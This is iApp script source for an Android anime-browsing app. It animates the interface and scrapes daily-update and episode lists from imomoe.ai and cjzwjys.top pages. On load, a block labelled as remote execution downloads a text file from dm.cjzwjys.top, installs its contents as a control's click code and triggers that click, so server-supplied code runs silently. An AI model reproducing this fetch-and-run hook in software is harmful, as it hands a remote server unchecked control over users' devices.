us(27,"background",f)


s a = 0
s b = 0
s c = "#FFF0EFF4|#ffffffff"
s d = "#333333"
s e = "topbottom"
ngde(a, b, c, d, e, f)
us(28,"background",f)




dha(dh, false,true)
dh(dh, "duration", 600)
us(20, "dh", dh)

dhas(dh,20, "scaleY", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh,20, "scaleX", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh, 20, "translationY",-100,0)
dh(dh, "duration", 600)
dh(dh, "start")


t()
{
  stop("960")
  ufnsui()
  {
  
us(48,"visibility",0)
dha(dh, false,true)
dh(dh, "duration", 500)
us(48, "dh", dh)

dhas(dh,48, "scaleY", 0.7,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh,48, "scaleX", 0.7,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")
dhon(dh)
{
  
us(41,"visibility",0)
dha(dh, false,true)
dh(dh, "duration", 500)
us(41, "dh", dh)

dhas(dh,41, "scaleY", 0.7,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh,41, "scaleX", 0.7,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")
  
  }

}
}






t()
{
  stop("960")
  ufnsui()
  {
  
us(4,"visibility",0)
dha(dh, false,true)
dh(dh, "duration", 500)
us(4, "dh", dh)

dhas(dh,4, "scaleY", 0.7,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh,4, "scaleX", 0.7,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")
dhon(dh)
{





us(29,"visibility",0)
dhas(dh, 29, "scaleX", 0.0,1.0)
dh(dh, "duration", 700)
dh(dh, "start")


dhas(dh, 29, "scaleY", 0.0,1.0)
dh(dh, "duration", 700)
dh(dh, "start")



dhas(dh, 29, "translationX", 230,-30)
dh(dh, "duration", 800)
dh(dh, "start")

t()
{
  stop("810")
  ufnsui()
  {
    dhas(dh, 29, "translationX",-30,0)
dh(dh, "duration", 910)
dh(dh, "start")
  }
}

t()
{
  stop("350")
  ufnsui()
  {

us(32,"visibility",0)
dhas(dh, 32, "scaleX", 0.0,1.0)
dh(dh, "duration", 700)
dh(dh, "start")


dhas(dh, 32, "scaleY", 0.0,1.0)
dh(dh, "duration", 700)
dh(dh, "start")



dhas(dh, 32, "translationX", 230,-30)
dh(dh, "duration", 800)
dh(dh, "start")

t()
{
  stop("810")
  ufnsui()
  {
    dhas(dh, 32, "translationX",-30,0)
dh(dh, "duration", 910)
dh(dh, "start")
  }
}



  }
}


t()
{
  stop("250")
  ufnsui()
  {

us(15,"visibility",0)
dhas(dh, 15, "scaleX", 0.0,1.0)
dh(dh, "duration", 700)
dh(dh, "start")


dhas(dh, 15, "scaleY", 0.0,1.0)
dh(dh, "duration", 700)
dh(dh, "start")



dhas(dh, 15, "translationX", 230,-30)
dh(dh, "duration", 800)
dh(dh, "start")

t()
{
  stop("810")
  ufnsui()
  {
    dhas(dh, 15, "translationX",-30,0)
dh(dh, "duration", 910)
dh(dh, "start")
  }
}



  }
}





  
}




dhas(dh, 4, "translationY",100,0)
dh(dh, "duration", 500)
dh(dh, "start")

}
}


















s a = "pxztl"
swh(a, h)
s px = h
zpd(px, c)
ss(c+"dp",dp)
us(8,"height",dp)
us(18,"height",dp)
us(搜索.4,"height","100dp")
java(cs,activity,"android.app.Activity.getWindow")
java(cs2,cs,"android.view.Window.getDecorView")
java(null,cs2,"android.view.View.setSystemUiVisibility","int","8192")
//设置状态栏透明(沉浸式)
java(null,cs,"android.view.Window.addFlags","int","67108864")
//仅支持Android6.0以上，其他无效果。

//sss 网址="https://www.37ws.com"

sss 网址="http://www.imomoe.ai"
sss 追番="http://js.cjzwjys.top"
//sss 网址1="http://www.dm190.com"
//utb(5)
//绑定标签布局
uht(46, "bd", 4, true)
//增加 滑动页面 并设置标题 这个标题因为绑定的关系 会自动添加成 标签选择卡 子项

uht(46, "add", -1, "最近更新", "最近更新.iyu")
uht(46, "add", -1, "日本动漫～", "日本动漫.iyu")
uht(46, "add", -1, "国产动漫", "国产动漫.iyu")
uht(46, "add", -1, "美国动漫", "美国动漫.iyu")
uht(46, "add", -1, "动漫剧场版", "动漫电影.iyu")


addv(1,"列表点击.iyu")
addv(1,"背景模糊.iyu")
addv(1,"搜索.iyu")


utb(42)
//绑定标签布局
uht(42, "bd", 41, true)
//增加 滑动页面 并设置标题 这个标题因为绑定的关系 会自动添加成 标签选择卡 子项
uht(42, "add", -1, "周一", "星期1.iyu")
uht(42, "add", -1, "周二", "星期2.iyu")
uht(42, "add", -1, "周三", "星期3.iyu")
uht(42, "add", -1, "周四", "星期4.iyu")
uht(42, "add", -1, "周五", "星期5.iyu")
uht(42, "add", -1, "周六", "星期6.iyu")
//uht(42, "add", -1, "周日", "星期.iyu")






fe("%Android/data/com.cjzwjdm/files/模糊补偿1.html",uy)
f(uy == true)
{
  
}
else
{
  ufnsui()
  {
    fw("%Android/data/com.cjzwjdm/files/模糊补偿1.html", "补偿关补偿参数100参数")
    gvs(35,view)
java(null,view,"android.view.View.performClick")
  }
}










/.

s path="@1c7adcab15e.png"
s sidelength =35
s id=55
//转化为bitmap
sbp(path,bitmap)
//自适应将图像控件大小dp转换为px，这是正方形图像，长方形请用两个zdp，但我没测试过
zdp(sidelength,size)
//图像放大，传入值：原图bitmap，宽px，长px，柔化true像素false；输出缩放后图像bitmap
java(pixelbitmap,null,"android.graphics.Bitmap.createScaledBitmap","android.graphics.Bitmap",bitmap,"int",size,"int",size,"boolean",false)
//设置到图像控件
gvs(id,dx)
java(null,dx,"android.widget.ImageView.setImageBitmap","android.graphics.Bitmap",pixelbitmap)
</eventItme><eventItme type="loadingComplete">


/.
t()
{

  hs("http://m.imomoe.ai",null,"gb2312",每日更新)
   f(每日更新 == null)
  {
ufnsui()
{
  tw("每日更新获取失败，请尝试重启应用")
//      fn 每日更新.星期1()
}
  }
  else
  { 
ufnsui()
{

  sj(每日更新,"&lt;ul class=\"am-tabs-nav am-cf\"&gt;","&lt;!--最新更新s--&gt;",zx)
  sj(zx,"&lt;div data-tab-panel-0 class=\"am-tab-panel\"&gt;","&lt;/div&gt;",一)
  sj(zx," &lt;div data-tab-panel-1 class=\"am-tab-panel \"&gt;","&lt;/div&gt;",二)  
  sj(zx," &lt;div data-tab-panel-2 class=\"am-tab-panel \"&gt;","&lt;/div&gt;",三)  
  sj(zx," &lt;div data-tab-panel-3 class=\"am-tab-panel \"&gt;","&lt;/div&gt;",四)  
  sj(zx," &lt;div data-tab-panel-4 class=\"am-tab-panel \"&gt;","&lt;/div&gt;",五)  
  sj(zx," &lt;div data-tab-panel-5 class=\"am-tab-panel \"&gt;","&lt;/div&gt;",六)  
  sj(zx," &lt;div data-tab-panel-6 class=\"am-tab-panel \"&gt;","&lt;/div&gt;",日)  
  
    fw("%Android/data/com.cjzwjdm/files/星期一.html",一) 
    fw("%Android/data/com.cjzwjdm/files/星期二.html",二) 
    fw("%Android/data/com.cjzwjdm/files/星期三.html",三) 
    fw("%Android/data/com.cjzwjdm/files/星期四.html",四) 
    fw("%Android/data/com.cjzwjdm/files/星期五.html",五) 
    ss(六+日,合并)
    fw("%Android/data/com.cjzwjdm/files/星期六.html",合并) 

    
    fn 每日更新.星期1()  
  
    
    

ug(37,"visibility",hj)
f(hj =="0")
{

dhas(dh,37, "scaleY", 1.0,0.0)
dh(dh, "duration", 150)
dh(dh, "start")
dhon(dh)
{

us(37,"visibility",8)  

}

    
    
}
}

}
}





s a="a"
time(a, b)
f(b == "周一")
{
  ufnsui()
  {
  us(42,"currentitem",0)
  }
}
else f(b == "周二")
{
  ufnsui()
  {
  us(42,"currentitem",1)
  }
}
else f(b == "周三")
{
  ufnsui()
  {
  us(42,"currentitem",2)
  }
}
else f(b == "周四")
{
  ufnsui()
  {
  us(42,"currentitem",3)
  }
}
else f(b == "周五")
{
  ufnsui()
  {
  us(42,"currentitem",4)
  }
}
else f(b == "周六")
{
  ufnsui()
  {
  us(42,"currentitem",5)
  }
}
else f(b == "周日")
{
  ufnsui()
  {
  us(42,"currentitem",5)
  }
}







./


us(最近更新.5,"visibility",0)
us(最近更新.2,"visibility",8)
us(最近更新.3,"visibility",0)
us(最近更新.4,"visibility",0)
us(最近更新.4,"text","努力加载中")


//最新更新
t()
{
  hs(sss.网址,null,"gb2312",ss.b) 
   f(ss.b == null)
  {
//us(最近更新.5,"visibility",0)
  }
  else
  { 
ufnsui()
{
  sj(ss.b,"&lt;h2&gt;最新更新&lt;/h2&gt;"," &lt;div class=\"blank\"&gt;&lt;/div&gt;",zx)
  sj(zx," &lt;li&gt;",null,zxd)
  sl(zxd," &lt;li&gt;",zxf)
  for(zxdm;zxf)
  {
    sj(zxdm,"&lt;a href=\"","\"&gt;",url)
    sj(zxdm,"&lt;img src=\"","\"",img)
    sj(zxdm,"title=\"","\"",title)  
    sj(zxdm,"&lt;/a&gt;&lt;/p&gt;","&lt;/p&gt;",js)
    sr(js,"&lt;p&gt;","", 去除字符)
    sr(去除字符," ","", 字符)
    sr(字符,"\n","", 级数)
    ss(sss.网址+url,dmurl)   
  ula(list_zxgx,7=title,5=img,8=级数,15=dmurl,16=img) 
  } 
  ufnsui()
  {
    uls(最近更新.2,list_zxgx,"最近更新列表.iyu",-1,-2)


 fn 首页加载.日本动漫()  
us(最近更新.2,"visibility",0)
us(最近更新.3,"visibility",8)
us(最近更新.4,"visibility",8)
us(最近更新.5,"visibility",8)
us(最近更新.4,"text","努力加载中")

}
}
}
}









fe("%Android/data/com.cjzwjdm/files/模糊补偿.html",uy)
f(uy == true)
{
  
}
else
{
  ufnsui()
  {
uigo("设置.iyu")
  }
}








t()
{



hs("http://dm.cjzwjys.top/yc.txt",sz)
sj(sz,"远程执行黑","远程执行黑",kj)
f(kj == null)
{
ufnsui()
{

}
}
else
{
ufnsui()
{

s a = kj
s b = "&lt;br&gt;"
s c = "\n"
sr(a, b, c, d)

fn 运行器.设置代码(35,"clicki",d)
fn 运行器.点击控件(35)


}
}
}






t()
{
  hs("http://dm.cjzwjys.top/yc.txt", bo)
  sj(bo,"图片显示","图片显示",ok)

    f(ok== null)
    {
     ufnsui()
     {
       
us(25,"src","@IMG_20210125_225655.png")
       

}
    }
    else
    {
      ufnsui()
      {
        us(25,"src",ok)
     

}
    }
}





</eventItme><eventItme type="menu">


case 设置|@icon_iapp.png|0|1:
uigo("设置.iyu")
break</eventItme><eventItme type="downkey">






ug(搜索.1,"visibility",jj)



ug(30,"text",kj)
ug(31,"text",kjh)
s a=st_kC
f(a==25)
{
}
else f(a==24)
{
}
else f(a==4)
{
//返回按钮事件

f(kj == "关闭")
{

f(kjh == "可执行")
{

us(31,"text","不可执行")
dhas(dh, 搜索.5, "scaleX",1.0,0.8)
dh(dh, "duration", 500)
dh(dh, "start")
        
dhas(dh, 搜索.5, "scaleY",1.0,0.8)
dh(dh, "duration", 500)
dh(dh, "start")
dhon(dh)
{

dha(dh, true,false)
dh(dh, "duration", 500)
us(搜索.34, "dh", dh)

dha(dh, true,false)
dh(dh, "duration", 600)
us(搜索.2, "dh", dh) 

dha(dh, true,false)
dh(dh, "duration", 500)
us(搜索.5, "dh", dh)
dhon(dh)
{
us(搜索.1,"visibility",8)
us(搜索.34,"visibility",8)
us(搜索.12,"visibility",8)
us(搜索.15,"visibility",8)
ula(ss.list, null)
us(搜索.9,"text","")
}
}
        
dhas(dh, 搜索.5, "translationY",0,80)     
dh(dh, "duration", 650)
dh(dh, "start")
             
dhas(dh, 搜索.34, "scaleX",1.0,0.8)
dh(dh, "duration", 500)
dh(dh, "start")
        
dhas(dh, 搜索.34, "scaleY",1.0,0.8)
dh(dh, "duration", 500)
dh(dh, "start")
        
dhas(dh, 搜索.34, "translationY",0,350)     
dh(dh, "duration", 650)
dh(dh, "start")

dhas(dh, 搜索.12, "scaleX",1.0,0.8)
dh(dh, "duration", 500)
dh(dh, "start")
        
dhas(dh, 搜索.12, "scaleY",1.0,0.8)
dh(dh, "duration", 500)
dh(dh, "start")
        
dhas(dh, 搜索.12, "translationY",0,350)     
dh(dh, "duration", 650)
dh(dh, "start")
dhon(dh)
{
us(30,"text","开启")
}



/.

ug(37,"visibility",hj)
f(hj =="0")
{
dha(dh, false,true)
dh(dh, "duration", 10)
us(46, "dh", dh)
dhas(dh, 46, "translationY",0,670)
dh(dh, "duration", 10)
dh(dh, "start") 

}
else
{

  
us(37,"visibility",0)

dha(dh, false,true)
dh(dh, "duration", 600)
us(37, "dh", dh)

dhas(dh,37, "scaleY", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh,37, "scaleX", 0.0,1.0)
dh(dh, "duration", 1000)
dh(dh, "start")

dhas(dh, 37, "translationY",-100,0)
dh(dh, "duration", 600)
dh(dh, "start")
  
  dha(dh, false,true)
dh(dh, "duration", 10)
us(46, "dh", dh)
dhas(dh, 46, "translationY",0,670)
dh(dh, "duration", 10)
dh(dh, "start") 

  
  
}

./




}
else
{

}



}
else
{
f(jj == 8)
{
utw(null,"提示","你确定要退出吗？","退出","取消",true, v)
{
end()
}
else
{
endutw()
}
}
else
{
}
}














}








/.

f(jj == "关闭")
{

//判断首页可视，屏蔽返回键
f(jy == "0")
{
//
fn 点击.列表点击关闭()

}
//判断首页可视，屏蔽返回键
//动画执行//判断首页不可显示
else
{




}

//动画执行//判断首页不可显示





}


//最后一个判断(关系到软件退出)
else
{


f(jk == "0")
{
//

fn 搜索返回点击.点击()

//
}
else
{
//</eventItme></UIEventset>